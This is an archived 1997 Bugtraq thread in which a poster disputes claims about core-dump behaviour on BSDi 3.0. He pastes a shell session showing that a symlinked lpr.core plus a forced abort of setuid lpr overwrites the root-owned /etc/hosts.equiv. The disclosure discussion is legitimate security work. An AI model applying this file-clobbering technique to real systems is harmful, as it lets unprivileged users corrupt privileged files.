Bugtraq mailing list archives
Re: Core file anomalies under BSDi 3.0
From: ariel () FIREBALL TAU AC IL (Ariel Biener)
Date: Fri, 20 Jun 1997 20:53:16 +0300
On Thu, 19 Jun 1997, Nir Soffer wrote: [.snip.]
A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid program with priviliges isn't neccesary. B.) BSDi _does_ however, check if the file exists, so it's quite impossible to overwrite files.
Hmm, this is not my experience: slingshot: {2} % id uid=100(ariel) gid=20(staff) groups=20(staff), 0(wheel) slingshot: {3} % ls -l /etc/hosts.equiv -rw------- 1 root wheel 0 Jun 20 22:43 /etc/hosts.equiv slingshot: {4} % ln -s /etc/hosts.equiv lpr.core slingshot: {5} % lpr ^Z Suspended slingshot: {6} % kill -ABRT %1 slingshot: {7} % fg lpr Abort (core dumped) slingshot: {8} % ls -l /etc/hosts.equiv -rw------- 1 root wheel 167936 Jun 20 22:45 /etc/hosts.equiv slingshot: {9} % su Password: Jun 20 22:46:34 slingshot su: ariel to root on /dev/ttyp0 slingshot: {1} % uname -a BSD/OS slingshot.tau.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #0: Mon Jun 16 19:51:22 IDT 1997 root () slingshot tau ac il:/usr/src/sys/compile/SLINGSHOT i386 It wont work if the target file is *not* mode 0600 . --Ariel
C.) BSDi _does_ change the permissions of the core dump to 600, and it keeps on being owned by root, so changing the file is impossible as well. Regards, Nir. -- Nir Soffer AKA ScorpioS, scorpios () cs huji ac il . USER, n.: The word computer professionals use when they mean "idiot." -- Dave Barry, "Claw Your Way to the Top"
+---------------------------------------------------------+ | Ariel Biener | | e-mail: ariel () post tau ac il Work ph: 03-6406086 | +---------------------------------------------------------+
Current thread:
- Re: Netscape Admin Servers /tmp/deamonstat Matthew Archibald (Jun 17)
- Re: Netscape Admin Servers /tmp/deamonstat Joe Zbiciak (Jun 17)
- Solaris 2.5.1 party piece Alan Cox (Jun 19)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- Re: Core file anomalies under BSDi 3.0 Theo de Raadt (Jun 20)
- Re: Core file anomalies under BSDi 3.0 Ariel Biener (Jun 20)
- http://www.news.com/News/Item/0,4,11759,00.html Aleph One (Jun 20)
- Re: http://www.news.com/News/Item/0,4,11759,00.html Raymond Dijkxhoorn (Jun 21)
- Re: Core file anomalies under BSDi 3.0 Stacey Son (Jun 20)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- /cgi-bin/handler - more notes Razvan Dragomirescu (Jun 19)
- Re: Solaris 2.5.1 party piece Doug Hughes (Jun 19)
- Re: Solaris 2.5.1 party piece Bojan Zdrnja (Jun 20)
- Re: Solaris 2.5.1 party piece Joe Gross (Jun 20)
- <Possible follow-ups>
- Re: Netscape Admin Servers /tmp/deamonstat Corinne Posse (Jun 17)
- Re: Netscape Admin Servers /tmp/deamonstat Valdis.Kletnieks () VT EDU (Jun 18)
- Re: your mail J. Joseph Max Katz (Jun 18)
- Re: Netscape Admin Servers /tmp/deamonstat Valdis.Kletnieks () VT EDU (Jun 18)